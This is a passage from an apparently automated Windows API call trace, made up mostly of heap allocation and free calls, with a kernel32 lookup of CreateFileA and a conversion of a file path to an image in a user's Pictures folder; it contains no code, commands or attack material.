| out: hHeap=0x8a0000) returned 1 [0190.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0190.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0190.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0190.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0190.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0190.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0190.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0190.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0190.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0190.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0190.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0190.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0190.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0190.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0190.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0190.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0190.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0190.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0190.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0190.537] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0190.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0190.537] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0190.537] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0190.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0190.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0190.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0190.537] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0190.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0190.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0190.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0190.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b10 [0190.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0190.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0190.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0190.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0190.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0190.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0190.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0190.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdb10 [0190.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0190.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0190.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0190.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0190.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0190.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0190.538] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0190.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0190.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0190.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0190.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0190.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0190.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0190.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0190.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0190.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0190.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0190.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0190.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0190.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0190.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0190.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0190.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0190.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0190.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0190.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0190.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0190.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0190.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0190.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0190.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0190.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0190.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0190.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0190.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0190.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0190.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0190.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0190.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0190.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0190.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0190.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0190.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0190.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0190.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0190.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0190.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0190.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0190.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0190.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0190.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0190.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0190.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0190.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0190.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0190.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0190.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0190.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0190.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0190.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0190.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0190.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0190.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0190.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0190.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0190.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0190.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0190.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0190.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0190.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0190.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0190.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0190.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0190.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0190.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0190.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0190.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0190.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0190.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0190.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0190.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0190.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0190.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0190.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0190.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0190.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0190.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0190.541] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0190.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0190.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0190.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0190.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0190.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0190.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0190.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0190.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0190.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0190.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0190.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0190.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0190.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0190.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0190.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0190.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0190.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0190.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0190.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0190.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0190.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0190.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0190.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0190.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0190.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0190.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0190.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0190.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0190.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0190.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0190.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0190.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0190.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0190.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0190.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0190.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0190.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0190.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0190.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0190.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0190.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0190.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0190.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0190.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0190.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0190.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0190.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0190.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0190.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0190.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0190.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0190.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0190.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0190.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0190.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0190.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0190.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0190.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0190.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0190.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0190.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0190.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0190.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0190.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0190.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0190.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0190.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0190.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0190.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0190.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0190.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0190.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0190.544] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0190.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0190.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0190.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0190.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9b9fa0 [0190.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9b9fa0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0190.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0190.544] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0190.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0190.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0190.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0190.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0190.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0190.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0190.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0190.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fa0 [0190.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9b9fa0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0190.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0190.545] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0190.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0190.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0190.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0190.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0190.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0190.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0190.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0190.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0190.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0190.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0190.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0190.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0190.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0190.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif", cchWideChar=67, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 67 [0190.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x43) returned 0x9aa548 [0190.545] 